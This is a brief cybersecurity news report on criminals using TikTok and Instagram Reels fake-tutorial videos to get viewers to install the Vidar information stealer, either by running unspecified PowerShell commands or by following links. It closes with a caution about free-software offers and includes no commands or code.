Cybercriminals are increasingly leveraging short-form video platforms like TikTok and Instagram Reels to disseminate malware through deceptive software tutorials. These videos, often polished and convincing, promise free access to premium software but instead lead users to download malicious programs.
According to CyberSecurityNews, attackers create videos that blend seamlessly with legitimate content, making them difficult to distinguish. These clips, sometimes amassing thousands of views and likes, exploit the trust users place in popular social media platforms.
ReversingLabs researchers identified two primary methods employed in these campaigns. Both direct users to third-party websites hosting malware disguised as free premium applications. The malware in question, Vidarstealer, is an information-stealing tool that extracts login credentials, financial data, and session tokens from infected devices. Notably, Vidarstealer received an update in October of the previous year, enhancing its evasion capabilities.
In the first campaign, attackers use accounts with usernames like “windows.tips” or “windows.insights,” featuring profile images resembling official Windows icons. These accounts post professional tutorial videos with AI-generated voiceovers, instructing users to execute specific PowerShell commands to unlock software like Spotify Premium. Following these instructions leads to the silent download and execution of Vidarstealer.
The second campaign adopts a more casual approach. Accounts post short clips showcasing premium Spotify features accompanied by trending music, encouraging viewers to visit external links for free access. These links direct users to malicious websites that deliver the malware.
These campaigns highlight the evolving tactics of cybercriminals, who now exploit the widespread reach and trust associated with social media platforms to distribute malware. Users should exercise caution when encountering offers for free software and avoid executing commands or downloading applications from unverified sources.
Source: CyberSecurityNews
